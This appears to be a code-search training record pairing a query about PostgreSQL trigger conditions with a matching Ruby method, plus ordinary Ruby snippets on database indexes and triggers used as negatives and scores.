"def test_indexes\n idx_name = \"accounts_idx\"\n\n indexes = @connection.indexes(\"accounts\")\n assert_empty indexes\n\n @connection.add_index :accounts, :firm_id, name: idx_name\n indexes = @connection.indexes(\"accounts\")\n assert_equal \"accounts\", indexes.first.table\n assert_equal idx_name, indexes.first.name\n assert !indexes.first.unique\n assert_equal [\"firm_id\"], indexes.first.columns\n ensure\n @connection.remove_index(:accounts, name: idx_name) rescue nil\n end",
"def test_indexes\n idx_name = \"accounts_idx\"\n\n indexes = @connection.indexes(\"accounts\")\n assert_empty indexes\n\n @connection.add_index :accounts, :firm_id, name: idx_name\n indexes = @connection.indexes(\"accounts\")\n assert_equal \"accounts\", indexes.first.table\n assert_equal idx_name, indexes.first.name\n assert !indexes.first.unique\n assert_equal [\"firm_id\"], indexes.first.columns\n ensure\n @connection.remove_index(:accounts, name: idx_name) rescue nil\n end",
"def index_exists?(table_name, column_name, options = {})\n column_names = Array.wrap(column_name)\n index_name = options.key?(:name) ? options[:name].to_s : index_name(table_name, column: column_names)\n\n # Always compare the index name\n default_comparator = lambda { |index| index.name == index_name }\n comparators = [default_comparator]\n\n # Add a comparator for each index option that is part of the query\n index_options = [:unique, :where]\n index_options.each do |index_option|\n comparators << if options.key?(index_option)\n lambda do |index|\n pg_where_clause = index.send(index_option)\n # pg does nothing to boolean clauses, e.g. 'where active' => 'where active'\n if pg_where_clause.is_a?(TrueClass) or pg_where_clause.is_a?(FalseClass)\n pg_where_clause == options[index_option]\n else\n # pg adds parentheses around non-boolean clauses, e.g. 'where color IS NULL' => 'where (color is NULL)'\n pg_where_clause.gsub!(/[()]/,'')\n # pg casts string comparison ::text. e.g. \"where color = 'black'\" => \"where ((color)::text = 'black'::text)\"\n pg_where_clause.gsub!(/::text/,'')\n # prevent case from impacting the comparison\n pg_where_clause.downcase == options[index_option].downcase\n end\n end\n else\n # If the given index_option is not an argument to the index_exists? query,\n # select only those pg indexes that do not have the component\n lambda { |index| index.send(index_option).blank? }\n end\n end\n\n # Search all indexes for any that match all comparators\n indexes(table_name).any? do |index|\n comparators.inject(true) { |ret, comparator| ret && comparator.call(index) }\n end\n end",
"def index_options\n return false unless index && index == entity.key_column\n if entity.is_core\n { unique: true }\n else\n true\n end\n end",
"def construct_index\n end",
"def to_create_index_sql\n queries = []\n unless indexes.blank?\n indexes.each do |column|\n sql = \"CREATE INDEX #{to_s.downcase}_#{column}_index ON \"\n sql << \"#{to_sql} (#{column.to_sql})\"\n queries << sql.compress_lines\n end\n end\n queries\n end",
"def index_relations(exclude_relations: []); end",
"def supports_index_operator_class?\n false\n end",
"def with_index(name = nil, &block)\n name ||= caller(1)[0].match(/in `(.*)'\\z/)[1]\n mapper.indexes[name.to_s] or begin\n indexable = yield\n mapper.add_index(name, indexable)\n end\n end",
"def multi_column_index_limit\n @multi_column_index_limit ||= 32\n end",
"def index_on( field, opts={} )\n opts = Gnash.new( opts )\n design_document(true).add!( opts.merge!(:name => field) )\n unless indexes.include?( field )\n indexes << field.to_sym \n indexes << field.to_s \n end \n self \n end",
"def index_valid?(index)\n index > -1 && index != length ? true : false\n end",
"def indices(*rest) end",
"def indices(*rest) end",
"def has_index?\n INDEX_REGEXP =~ rootname_minus_role\n end",
"def should_index?\n\t\t!deleted?\n \tend",
"def indexes_per_table\n 65_535\n end",
"def has_unique_index(name, *fields)\n indexes[name] = fields\n end",
"def get_indexes\n table_cond = @files ? \"AND r.relname IN (#{@files.map{|(t,f)|\"'#{t}'\"}.join(', ')})\" : ''\n results = query(<<-SQL)\n SELECT\n r.relname,\n i.relname,\n ri.indisprimary,\n pg_get_indexdef(i.oid)\n FROM\n pg_class r,\n pg_class i,\n pg_index ri\n WHERE\n ri.indexrelid = i.oid\n AND ri.indrelid = r.oid\n AND r.relkind = 'r'\n AND i.relkind = 'i'\n AND r.relnamespace = (SELECT oid FROM pg_namespace WHERE nspname = '#{@config[:schema]}')\n #{table_cond}\n SQL\n\n hash = Hash.new(){|hash, key| hash.store(key, [])}\n results.each do |row|\n table, index, primary_key, create_sql = row.split(/\\t/)\n hash[table] << {:index => index, :primary_key => primary_key == 't', :create_sql => create_sql}\n end\n hash\n end",
"def test_can_create_index\n @session.execute(\"CREATE TABLE simplex.test (a text PRIMARY KEY, b text)\")\n @session.execute(\"CREATE INDEX b_index ON simplex.test (b)\")\n\n @listener.wait_for_index('simplex', 'test', 'b_index')\n\n assert @cluster.keyspace('simplex').table('test').has_index?('b_index')\n index = @cluster.keyspace('simplex').table('test').index('b_index')\n assert @cluster.keyspace('simplex').has_index?('b_index')\n assert_same(index, @cluster.keyspace('simplex').index('b_index'))\n assert_equal 'b_index', index.name\n assert_equal 'test', index.table.name\n assert_equal :composites, index.kind\n assert_equal 'b', index.target\n end",
"def index_signature; end",
"def load_physical_schema(conn, builder)\n builder.indexes{\n conn.tables.each{|table|\n conn.indexes(table).each_pair{|name, defn|\n next if defn[:unique]\n builder.index(name, {:relvar => table, :attributes => defn[:columns]})\n }\n }\n }\n end",
"def method_missing ( method, *args )\n # Handle all valid *_index/*_key calls:\n return _addIndexes( method, *args ) if VALID_INDEX_HINTS.include? method \n super\n end",
"def create_indexes\n source_attributes = self.base_class.attributes\n self.indexes.each do |name, index|\n opts = {:table_name => index.table_name, :id => :id}\n if index.range_key?\n if index.range_keys.select{|v| !source_attributes[v].nil? && source_attributes[v][:type] == :string}.any?\n opts[:range_key] = { :range => :string }\n else\n opts[:range_key] = { :range => :number }\n end\n else\n opts[:range_key] = nil\n end\n self.create_table(opts)\n end\n end",
"def supports_index_parsing?\n respond_to?(:indexes)\n end",
"def indexes(table_name, name = nil)#:nodoc:\n indexes = []\n current_index = nil\n (execute(\"SHOW KEYS FROM #{table_name}\", name) || []).each do |row|\n if current_index != row[2]\n next if row[2] == \"PRIMARY\" # skip the primary key\n current_index = row[2]\n indexes << ActiveRecord::ConnectionAdapters::IndexDefinition.new(row[0], row[2], row[1] == \"0\", [], row[10] == \"SPATIAL\")\n end\n indexes.last.columns << row[4]\n end\n indexes\n end",
"def create_simple_index(table_name, index_name, column)\n spec = new IndexSpecification(index_name, column.to_java_bytes)\n create_index(table_name, spec)\nend",
"def stream_all_indexed_slices(index, key)\n expr = do_op(:create_idx_expr, index, key, \"EQ\")\n\n start_row = ''\n row_count = 10\n has_more_rows = true\n\n while (start_row != nil)\n clause = do_op(:create_idx_clause, [expr], start_row, row_count)\n\n rows = self.conn.get_indexed_slices(column_family, clause, index,\n :key_count => row_count,\n :key_start => start_row)\n\n rows = rows.keys\n rows.shift unless start_row == ''\n start_row = rows.last\n\n rows.each do |row|\n start_column = ''\n column_count = 1_000\n has_more_columns = true\n\n while has_more_columns\n clause = do_op(:create_idx_clause, [expr], row, 1)\n chunk = self.conn.get_indexed_slices(column_family, clause, nil,\n :start => start_column,\n :count => column_count)\n\n # Get first row's columns, because where are getting only one row [see clause, for more details]\n key = chunk.keys.first\n columns = chunk[key]\n\n columns.shift unless start_column == ''\n yield(key, columns) unless chunk.empty?\n\n if columns.size >= column_count - 1\n #Assume there are more columns, use last column as start of next slice\n start_column = columns.last.column.name\n column_count = 1_001\n else\n has_more_columns = false\n end\n end\n end\n end\n end",
"def ensureIndex(table,keys,options={})\n connection.ensureIndex(path(table),keys,options)\n end",
"def stream_all_indexed_slices(index, key)\n expr = do_op(:create_idx_expr, index, key, \"EQ\")\n\n start_row = ''\n row_count = 10\n has_more_rows = true\n\n while (start_row != nil)\n clause = do_op(:create_idx_clause, [expr], start_row, row_count)\n\n rows = self.conn.get_indexed_slices(column_family, clause, 'account_id',\n :key_count => row_count, :key_start => start_row)\n rows = rows.keys\n rows.shift unless start_row == ''\n start_row = rows.last\n\n rows.each do |row|\n start_column = ''\n column_count = 1_000\n has_more_columns = true\n\n while has_more_columns\n clause = do_op(:create_idx_clause, [expr], row, 1)\n chunk = self.conn.get_indexed_slices(column_family, clause, nil,\n :start => start_column,\n :count => column_count)\n\n key = chunk.keys.first\n columns = chunk.values.first\n columns.shift unless start_column == ''\n yield(key, columns) unless chunk.empty?\n\n if columns.size >= column_count - 1\n #Assume there are more columns, use last column as start of next slice\n start_column = columns.last.column.name\n column_count = 1_001\n else\n has_more_columns = false\n end\n end\n end\n end\n end",
"def multi_column_index_limit\n defined?(@multi_column_index_limit) && @multi_column_index_limit || 32\n end",
"def create_indexes(table)\n return if !@index\n if !@dry_run\n begin\n connection.query(\"ALTER IGNORE TABLE #{table} ADD PRIMARY KEY (dtime, id)\")\n verbose \" Created primary key index.\"\n rescue\n nil # If we couldn't create the index (because it exists), that's OK.\n end\n end\n end",
"def ensure_indices\n @dao.collection.ensure_index(\n [['identity.email', Mongo::ASCENDING]],\n index_options([:background, :unique])\n )\n @dao.collection.ensure_index([['customer_id', Mongo::ASCENDING]], index_options)\n @dao.collection.ensure_index([['slug', Mongo::ASCENDING]], index_options)\n @indexed = true\n end",
"def index\n set_index\n end",
"def index\n return patterned_index if params[:pattern].present?\n\n index_full\n end",
"def rebuild_pgindex!\n self.all.each { |model| model.rebuild_pgindex! }\n end",
"def index\r\n build_index unless @index\r\n @index\r\n end",
"def index_on_ivar( field ) \n index_on( field,\n :map => \"\n function(doc) {\n if( doc['class'] == '#{parent_class}' &&\n doc['ivars'] && doc['ivars']['@#{field}'] ){\n emit( doc['ivars']['@#{field}'], 1 );\n }\n }\n \"\n )\n end",
"def test_spatial_index\n shape_lyr = create_poly_layer(@shape_ds)\n feat = populate_poly_layer(shape_lyr)\n\n add_geometryless_feature(shape_lyr)\n\n shape_lyr.set_attribute_filter(\"\")\n @shape_ds.execute_sql('CREATE SPATIAL INDEX ON tpoly')\n\n assert(File.exist?(File.join(temp_dir, 'tpoly.qix')),\n 'tpoly.qix not created' )\n\n geom = Gdal::Ogr.create_geometry_from_wkt('LINESTRING(479505 4763195,480526 4762819)')\n shape_lyr.set_spatial_filter(geom)\n\n assert(check_features_against_list(shape_lyr, 'eas_id', [ 158, nil ]))\n shape_lyr.set_spatial_filter(nil)\n @shape_ds.execute_sql( 'DROP SPATIAL INDEX ON tpoly' )\n\n assert(!File.exist?(File.join(temp_dir, 'tpoly.qix')),\n 'tpoly.qix not deleted')\n end",
"def indexed\n meta(index: true)\n end",
"def index_exists?(index)\n indexes([index[:table]]).find {|i| i[\"columns\"] == index[:columns]}\n end",
"def indexes(table, stream)\n if (indexes = @connection.indexes(table)).any?\n add_index_statements = indexes.map do |index|\n statement_parts = [\n ('add_index ' + index.table.inspect),\n index.columns.inspect,\n (':name => ' + index.name.inspect),\n ]\n statement_parts << ':unique => true' if index.unique\n\n index_lengths = (index.lengths || []).compact\n statement_parts << (':length => ' + Hash[index.columns.zip(index.lengths)].inspect) unless index_lengths.empty?\n\n index_orders = (index.orders || {})\n statement_parts << (':order => ' + index.orders.inspect) unless index_orders.empty?\n\n # changed from rails 2.3\n statement_parts << (':where => ' + index.where.inspect) if index.where\n statement_parts << (':index_type => ' + index.index_type.inspect) if index.index_type\n statement_parts << (':index_opclass => ' + index.index_opclass.inspect) if index.index_opclass.present?\n # /changed\n\n ' ' + statement_parts.join(', ')\n end\n\n stream.puts add_index_statements.sort.join(\"\\n\")\n stream.puts\n end\n end",
"def safe_add_index(*args, **options); end",
"def index_finalized\n index\n end",
"def indexes\n @model.indexes.select{|index| index.columns.include? self.name}\n end",
"def install_missing_indexes\n db_connection.execute(\n <<-SQL\n SELECT install_missing_indexes();\n SQL\n )\n end",
"def index_exists?(*args)\n super\n end"
] |
[
"0.78717965",
"0.7054134",
"0.7054134",
"0.63987356",
"0.63508844",
"0.63295084",
"0.6323869",
"0.6159993",
"0.61426693",
"0.61346114",
"0.6086542",
"0.60757685",
"0.6067708",
"0.6039056",
"0.60032016",
"0.5991477",
"0.5991477",
"0.5944628",
"0.5943683",
"0.5924851",
"0.59207773",
"0.59115565",
"0.5903184",
"0.5900522",
"0.5900522",
"0.58731586",
"0.58711076",
"0.58652544",
"0.58652544",
"0.5849039",
"0.58179593",
"0.5793357",
"0.575849",
"0.57545364",
"0.57352597",
"0.5715954",
"0.56998366",
"0.56998366",
"0.5695067",
"0.56910884",
"0.56906945",
"0.5690127",
"0.56866705",
"0.5677714",
"0.5665117",
"0.56449306",
"0.5639495",
"0.5639495",
"0.56345636",
"0.56335753",
"0.56326103",
"0.5619838",
"0.5617882",
"0.5612908",
"0.5612908",
"0.5610724",
"0.55734867",
"0.5542291",
"0.55265963",
"0.5522739",
"0.55061144",
"0.54832965",
"0.5482879",
"0.5471717",
"0.5459486",
"0.54343784",
"0.54343784",
"0.54323804",
"0.5430369",
"0.54237896",
"0.5418028",
"0.54003245",
"0.54002213",
"0.5393312",
"0.5385924",
"0.53809",
"0.53653294",
"0.5364801",
"0.5356759",
"0.5353016",
"0.5351405",
"0.53427196",
"0.5338789",
"0.5337907",
"0.5335454",
"0.5335065",
"0.5325844",
"0.53227556",
"0.5317773",
"0.5313214",
"0.53032285",
"0.53018266",
"0.52670616",
"0.52604824",
"0.52540165",
"0.52506703",
"0.5244728",
"0.5243229",
"0.5239263",
"0.52372897"
] |
0.79788727
|
0
|
PostgreSQL 9.0+ supports trigger conditions.
|
def supports_trigger_conditions?
server_version >= 90000
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def pgt_trigger(table, trigger_name, function_name, events, definition, opts={})\n create_function(function_name, definition, :language=>:plpgsql, :returns=>:trigger, :replace=>true)\n create_trigger(table, trigger_name, function_name, :events=>events, :each_row=>true, :after=>opts[:after])\n end",
"def triggers\n res = select_all <<-SQL\n SELECT n.nspname as schema,\n c.relname as table,\n t.tgname as trigger_name,\n t.tgenabled as enable_mode,\n t.tgdeferrable as is_deferrable,\n t.tginitdeferred as is_initially_deferrable,\n pg_catalog.pg_get_triggerdef(t.oid, true) as trigger_definition\n FROM pg_catalog.pg_trigger t\n INNER JOIN pg_catalog.pg_class c ON c.oid = t.tgrelid\n INNER JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace\n WHERE c.relkind IN ('r', 'v')\n AND NOT t.tgisinternal\n ORDER BY 1, 2, 3;\n SQL\n\n res.inject([]) do |buffer, row|\n schema = row['schema']\n table = row['table']\n trigger_name = row['trigger_name']\n is_deferrable = row['is_deferrable']\n is_initially_deferred = row['is_initially_deferred']\n\n trigger_definition = row['trigger_definition']\n\n is_constraint = is_constraint?(trigger_definition)\n proc_name = parse_proc_name(trigger_definition)\n event = parse_event(trigger_definition, trigger_name)\n condition = parse_condition(trigger_definition)\n\n for_every = !!(trigger_definition =~ /FOR[\\s]EACH[\\s]ROW/) ? :row : :statement\n\n if proc_name && event\n buffer << ::PgSaurus::ConnectionAdapters::TriggerDefinition.new(\n trigger_name,\n proc_name,\n is_constraint,\n event,\n for_every,\n is_deferrable,\n is_initially_deferred,\n condition,\n table,\n schema\n )\n end\n buffer\n end\n end",
"def checkTrigger\n\t end",
"def create_trigger(table_name, proc_name, event, options = {})\n\n end",
"def create_trigger_sql(table, name, function, opts=OPTS)\n events = opts[:events] ? Array(opts[:events]) : [:insert, :update, :delete]\n whence = opts[:after] ? 'AFTER' : 'BEFORE'\n if filter = opts[:when]\n raise Error, \"Trigger conditions are not supported for this database\" unless supports_trigger_conditions?\n filter = \" WHEN #{filter_expr(filter)}\"\n end\n \"CREATE #{'OR REPLACE ' if opts[:replace]}TRIGGER #{name} #{whence} #{events.map{|e| e.to_s.upcase}.join(' OR ')} ON #{quote_schema_table(table)}#{' FOR EACH ROW' if opts[:each_row]}#{filter} EXECUTE PROCEDURE #{function}(#{Array(opts[:args]).map{|a| literal(a)}.join(', ')})\"\n end",
"def triggers\n\n end",
"def create_trigger name, type, table_name, *actions\n create_function \"#{name}_f\", :returns=>'trigger',:as=>'$BODY$' do\n yield\n end\n execute %{CREATE TRIGGER #{name} #{type.to_s.upcase} #{actions.map{|str|str.upcase}.join(' OR ')}\n ON \"#{table_name}\" FOR EACH ROW\n EXECUTE PROCEDURE #{name}_f();}\n end",
"def enable_trigger(trigger = 'ALL')\n connection.enable_trigger(table_name, trigger)\n end",
"def parse_condition(trigger_definition)\n trigger_definition[/WHEN[\\s](.*?)[\\s]EXECUTE[\\s](FUNCTION|PROCEDURE)/m, 1]\n end",
"def is_constraint?(trigger_definition)\n !!(trigger_definition =~ /^CREATE CONSTRAINT TRIGGER/)\n end",
"def triggerStatements _args\n \"triggerStatements _args;\" \n end",
"def create_or_replace_replication_trigger_function(params)\n execute(<<-end_sql)\n DROP PROCEDURE IF EXISTS `#{params[:trigger_name]}`;\n end_sql\n \n activity_check = \"\"\n if params[:exclude_rr_activity] then\n activity_check = <<-end_sql\n DECLARE active INT;\n SELECT count(*) INTO active FROM #{params[:activity_table]};\n IF active <> 0 THEN\n LEAVE p;\n END IF;\n end_sql\n end\n\n execute(<<-end_sql)\n CREATE PROCEDURE `#{params[:trigger_name]}`(change_key varchar(2000), change_new_key varchar(2000), change_type varchar(1))\n p: BEGIN\n #{activity_check}\n INSERT INTO #{params[:log_table]}(change_table, change_key, change_new_key, change_type, change_time)\n VALUES('#{params[:table]}', change_key, change_new_key, change_type, now());\n END;\n end_sql\n \n end",
"def trigger_definition(table_name, trigger_name, name = nil)\n raise \"Internal Error: Connection adapter did not override abstract function\"\n end",
"def create_replication_trigger(params)\n create_or_replace_replication_trigger_function params\n\n %w(insert update delete).each do |action|\n execute(<<-end_sql)\n DROP TRIGGER IF EXISTS `#{params[:trigger_name]}_#{action}`;\n end_sql\n\n # The created triggers can handle the case where the trigger procedure\n # is updated (that is: temporarily deleted and recreated) while the\n # trigger is running.\n # For that an MySQL internal exception is raised if the trigger\n # procedure cannot be found. The exception is caught by an trigger\n # internal handler. \n # The handler causes the trigger to retry calling the\n # trigger procedure several times with short breaks in between.\n\n trigger_var = action == 'delete' ? 'OLD' : 'NEW'\n if action == 'update'\n call_statement = \"CALL `#{params[:trigger_name]}`(#{key_clause('OLD', params)}, #{key_clause('NEW', params)}, '#{action[0,1].upcase}');\"\n else\n call_statement = \"CALL `#{params[:trigger_name]}`(#{key_clause(trigger_var, params)}, null, '#{action[0,1].upcase}');\"\n end\n execute(<<-end_sql)\n CREATE TRIGGER `#{params[:trigger_name]}_#{action}`\n AFTER #{action} ON `#{params[:table]}` FOR EACH ROW BEGIN\n DECLARE number_attempts INT DEFAULT 0;\n DECLARE failed INT;\n DECLARE CONTINUE HANDLER FOR 1305 BEGIN\n DO SLEEP(0.05);\n SET failed = 1;\n SET number_attempts = number_attempts + 1;\n END;\n REPEAT\n SET failed = 0;\n #{call_statement}\n UNTIL failed = 0 OR number_attempts >= 40 END REPEAT;\n END;\n end_sql\n end\n\n end",
"def supports_triggers?\n version[0] >= 5\n end",
"def trigger\n trigger_function = \"insert_#{master_table}\"\n unless @column == 'page'\n column = \"#{@column},\"\n column_function = \"coalesce(quote_literal(NEW.#{@column}), 'NULL') || ',' ||\"\n end\n \n cmd = <<-COMMAND\n CREATE OR REPLACE FUNCTION #{trigger_function}() \n RETURNS TRIGGER AS $$ \n DECLARE\n ins_sql TEXT; \n BEGIN\n ins_sql := 'INSERT INTO daily_#{@column}_views_' || (NEW.writer_id % #{@partition_size}) ||\n '(date,article_id,#{column}count,writer_id,partition_id) \n VALUES ' ||\n '('|| quote_literal(NEW.date) || ',' || NEW.article_id ||',' ||\n \t#{column_function} \n \t\t\tNEW.count || ',' || \n \t\t\tNEW.writer_id || ',' || (NEW.writer_id % #{@partition_size}) ||')'\n ; \n EXECUTE ins_sql;\n RETURN NULL;\n END; \n $$\n LANGUAGE plpgsql;\n \n CREATE TRIGGER #{trigger_function}_trigger\n BEFORE INSERT ON #{master_table}\n FOR EACH ROW EXECUTE PROCEDURE #{trigger_function}();\n COMMAND\n @conns.each{|conn| conn.exec(cmd)}\n end",
"def enable_triggers(enable = true)\n triggers.each do |trigger|\n sql = \"alter trigger #{trigger.name} #{enable ? :enable : :disable}\"\n OracleTables.exec_sql sql\n end\n end",
"def find_and_trigger_event(event_type, args = nil)\r\n \r\n case event_type\r\n when :before_change\r\n \r\n if respond_to?(:before_change)\r\n \r\n results = send(:before_change, args)\r\n return false if results == false\r\n \r\n end\r\n \r\n when :after_change\r\n \r\n if respond_to?(:after_change)\r\n \r\n results = send(:after_change, args)\r\n return false if results == false\r\n \r\n end\r\n \r\n when :before_change_field\r\n \r\n #CALL FOR A SPECIFIC FIELD THAT HAS CHANGED\r\n trigger_function_name = \"#{:before_change_field}_#{args.field_name}\"\r\n if respond_to?(trigger_function_name)\r\n \r\n results = send(trigger_function_name, args) \r\n return false if results == false\r\n \r\n end\r\n \r\n #CALL FOR ANY FIELD THAT CHANGES\r\n trigger_function_name = \"#{:before_change_field}\"\r\n if respond_to?(trigger_function_name)\r\n \r\n results = send(trigger_function_name, args) \r\n return false if results == false\r\n \r\n end\r\n \r\n when :after_change_field\r\n #looks in own class for :after_change_field for the field passed, requires the parameter of a Field object to be passed\r\n \r\n #SAPPHIRE UPDATE\r\n #SEARCH FOR ACTIVE MAP DEFINITION THAT INCLUDES THE CURRENT TABLE AND FIELD.\r\n #IF ANY ARE FOUND QUEUE THE PROCESS\r\n if args.table.field_order.include?(\"student_id\")\r\n \r\n if map_id = $tables.attach(\"SAPPHIRE_INTERFACE_MAP\").field_value(\r\n \"primary_id\",\r\n \"WHERE athena_table = '#{table_name }'\r\n AND athena_field = '#{args.field_name }'\r\n AND trigger_event = 'after_change_field'\"\r\n )\r\n \r\n sid = $tables.attach(args.table.table_name).field_value(\"student_id\", \"WHERE primary_id = '#{args.primary_id}'\")\r\n student = $students.get(sid)\r\n \r\n if student && student.active.is_true?\r\n \r\n queue_record = $tables.attach(\"SAPPHIRE_INTERFACE_QUEUE\").new_row\r\n queue_record.fields[\"map_id\" ].value = map_id\r\n queue_record.fields[\"athena_pid\" ].value = args.primary_id\r\n queue_record.save\r\n \r\n end\r\n \r\n end\r\n \r\n end\r\n \r\n #CALL FOR A SPECIFIC FIELD THAT HAS CHANGED\r\n trigger_function_name = \"#{:after_change_field}_#{args.field_name}\"\r\n if respond_to?(trigger_function_name)\r\n \r\n results = send(trigger_function_name, args) \r\n return false if results == false\r\n \r\n end\r\n \r\n #CALL FOR ANY FIELD THAT CHANGES\r\n trigger_function_name = \"#{:after_change_field}\"\r\n if respond_to?(trigger_function_name)\r\n \r\n results = send(trigger_function_name, args)\r\n return false if results == false\r\n \r\n end\r\n \r\n when :before_load #any table can have this event for self table\r\n \r\n continue_with_load = true\r\n \r\n this_trigger_event = \"before_load_#{table_name.downcase}\"\r\n \r\n tables_with_before_load_events = args ? args : event_array(this_trigger_event)\r\n \r\n tables_with_before_load_events.each{|file|\r\n this_table = $tables.attach(file)\r\n \r\n begin\r\n continue_with_load = this_table.send(this_trigger_event)\r\n \r\n rescue=> e\r\n #raise e #THIS SHOULD HAVE BEEN A SYSTEM NOTIFICATION - ADDING NOW BUT LEACING THIS NOTE HERE TO HELP IDENTIFY ANY ISSUES THAT MAY COME TO LIGHT WHICH WERE CONCEALED BY THIS BEFORE...\r\n $base.system_notification(\r\n subject = \"BEFORE LOAD FAILED - #{file}\",\r\n content = \"Don't just stand there and shout it; do something about it... Here's the error:\r\n #{e.message}\r\n <br>\r\n <br>\r\n #{e.backtrace}\"\r\n )\r\n \r\n end\r\n \r\n } if tables_with_before_load_events\r\n \r\n return continue_with_load\r\n \r\n when :after_load #any table can have this event for self table\r\n \r\n this_trigger_event = \"after_load_#{table_name.downcase}\"\r\n \r\n tables_with_after_load_events = args ? args.dup : event_array(this_trigger_event)\r\n \r\n db_config_record(\r\n field_name = \"phase_total\",\r\n new_value = tables_with_after_load_events.join(\",\")\r\n )\r\n db_config_record(\r\n field_name = \"phase_completed\",\r\n new_value = nil\r\n )\r\n \r\n if !args || args.include?(\"move_source_to_dest\")\r\n tables_with_after_load_events.delete(\"move_source_to_dest\")\r\n move_source_to_dest\r\n end\r\n \r\n tables_with_after_load_events.each{|file|\r\n this_table = $tables.attach(file)\r\n db_config_record(\r\n field_name = \"after_load_status\",\r\n new_value = \"Started #{file} - #{DateTime.now.strftime(\"%Y-%m-%d %H:%M:%S\")}\"\r\n )\r\n \r\n begin\r\n this_table.send(this_trigger_event)\r\n db_config_record = $tables.attach(\"Db_Config\").by_table_name(table_name)\r\n phase_completed = db_config_record.fields[\"phase_completed\"].value\r\n phase_completed = (phase_completed ? \"#{phase_completed},#{file}\" : file)\r\n db_config_record(\r\n field_name = \"phase_completed\",\r\n new_value = phase_completed\r\n )\r\n db_config_record(\r\n field_name = \"after_load_status\",\r\n new_value = \"Completed #{file} - #{DateTime.now.strftime(\"%Y-%m-%d %H:%M:%S\")}\"\r\n )\r\n \r\n rescue=> e\r\n after_load_failed(message = \"#{file} - #{e.message} <br><br> #{e.backtrace}\", e)\r\n raise e\r\n end\r\n \r\n } if tables_with_after_load_events\r\n \r\n when :after_insert\r\n send(:after_insert, args) if respond_to?(:after_insert)\r\n \r\n when :after_save\r\n send(:after_save, args) if respond_to?(:after_save)\r\n \r\n when :before_insert\r\n #Looks in own class for before_insert event, requires the parameter of a Row object to be passed\r\n if respond_to?(:before_insert)\r\n send(:before_insert, args)\r\n else\r\n return true\r\n end\r\n \r\n end\r\n \r\n return true\r\n \r\n end",
"def trigger!\n end",
"def create_trigger(table, name, function, opts=OPTS)\n self << create_trigger_sql(table, name, function, opts)\n end",
"def condition; end",
"def check_event_trigger_here(triggers)\n return false\n end",
"def add_trigger(table, events, options={})\n events += [:row] if options.delete(:row)\n events += [:before] if options.delete(:before)\n trigger = TriggerDefinition.new(0, table, options[:name], events, options[:function])\n execute trigger.to_sql_create\n end",
"def add_trigger(table, events, options={})\n events += [:row] if options.delete(:row)\n events += [:before] if options.delete(:before)\n trigger = TriggerDefinition.new(0, table, options[:name], events, options[:function])\n execute trigger.to_sql_create\n end",
"def trigger?(key)\n return @trigger[ key.is_a?(Symbol) ? KEY.get(key) : key ] \n end",
"def trigger(owner, event, *args); end",
"def create_trigger(database, table)\n options = self.options(table)\n\n params = {\n :trigger_name => \"#{options[:rep_prefix]}_#{table}\",\n :table => table,\n :keys => session.send(database).primary_key_names(table),\n :log_table => \"#{options[:rep_prefix]}_pending_changes\",\n :activity_table => \"#{options[:rep_prefix]}_running_flags\",\n :key_sep => options[:key_sep],\n :exclude_rr_activity => false,\n }\n\n event_filter = options[:event_filter]\n params[:filter_conditions] = event_filter.filter_conditions if event_filter.respond_to?(:filter_conditions)\n\n session.send(database).create_replication_trigger params\n end",
"def triggerize rel, target\n raise \"Wrong rel, expecting up or down\" if rel == nil\n raise \"Wrong target, expecting float\" if target == nil\n if rel == 'up'\n return lambda { |x| x >= target }\n elsif rel == 'down'\n return lambda { |x| x <= target }\n end\n end",
"def parse_event(trigger_definition, trigger_name)\n trigger_definition[/^CREATE[\\sA-Z]+TRIGGER[\\s]#{Regexp.escape(trigger_name)}[\\s](.*?)[\\s]ON[\\s]/m, 1]\n end",
"def test_can_retrieve_trigger_metadata\n skip(\"Triggers were introduced in Cassandra 2.0\") if CCM.cassandra_version < '2.0.0'\n\n # trigger1, on test1 table\n @session.execute(\"CREATE TRIGGER trigger1 ON simplex.test1 USING 'org.apache.cassandra.triggers.AuditTrigger'\")\n @listener.wait_for_trigger('simplex', 'test1', 'trigger1')\n\n assert @cluster.keyspace('simplex').table('test1').has_trigger?('trigger1')\n trigger_meta = @cluster.keyspace('simplex').table('test1').trigger('trigger1')\n assert_equal 'trigger1', trigger_meta.name\n assert_equal 'test1', trigger_meta.table.name\n assert_equal 'org.apache.cassandra.triggers.AuditTrigger', trigger_meta.options['class']\n\n # trigger1, on test2 table\n @session.execute(\"CREATE TRIGGER trigger1 ON simplex.test2 USING 'org.apache.cassandra.triggers.AuditTrigger'\")\n @listener.wait_for_trigger('simplex', 'test2', 'trigger1')\n\n assert @cluster.keyspace('simplex').table('test2').has_trigger?('trigger1')\n trigger_meta2 = @cluster.keyspace('simplex').table('test2').trigger('trigger1')\n assert_equal 'trigger1', trigger_meta2.name\n assert_equal 'test2', trigger_meta2.table.name\n assert_equal 'org.apache.cassandra.triggers.AuditTrigger', trigger_meta2.options['class']\n\n refute_equal trigger_meta, trigger_meta2\n end",
"def get_triggers\n connect_db.fetch(\"SELECT RDB$TRIGGER_NAME, RDB$TRIGGER_SOURCE FROM RDB$TRIGGERS WHERE RDB$SYSTEM_FLAG = 0\")\n end",
"def conditions; end",
"def conditions; end",
"def cond; end",
"def cond; end",
"def cond; end",
"def check_event_trigger_there(triggers)\n return false\n end",
"def check_event_trigger_here(triggers)\n result = false\n return result\n end",
"def on_change(value)\n \n end",
"def can_trigged?(event)\n false\n end",
"def createTrigger _args\n \"createTrigger _args;\" \n end",
"def on trigger, &block\n @handlers[trigger] = [] unless @handlers.key? trigger\n @handlers[trigger] << block\n end",
"def setTriggerStatements _obj, _args\n \"_obj setTriggerStatements _args;\" \n end",
"def trigger_options\n triggers.map { |t, _| [t.gsub('on_', '').titlecase, t] }\n end",
"def replication_trigger_exists?(trigger_name, table_name)\n !select_all(\"select 1 from information_schema.triggers where trigger_schema = database() and trigger_name = '#{trigger_name}_insert' and event_object_table = '#{table_name}'\").empty?\n end",
"def event_change\n\t\n\tend",
"def trigger_exists?(table_name, trigger_name)\n triggers(table_name).detect { |i| i.name == trigger_name }\n end",
"def conditionally(*) end",
"def conditionally(*) end",
"def triggers(name = nil)\n raise \"Internal Error: Connection adapter did not override abstract function\"\n end",
"def check_triggers\n @triggers.each do |trigger|\n trigger.evaluate\n end\n end",
"def disable_trigger(trigger = 'ALL')\n connection.disable_trigger(table_name, trigger)\n end",
"def trigger_condition_met?(_job)\n true\n end",
"def trigger\n\n return []\n end",
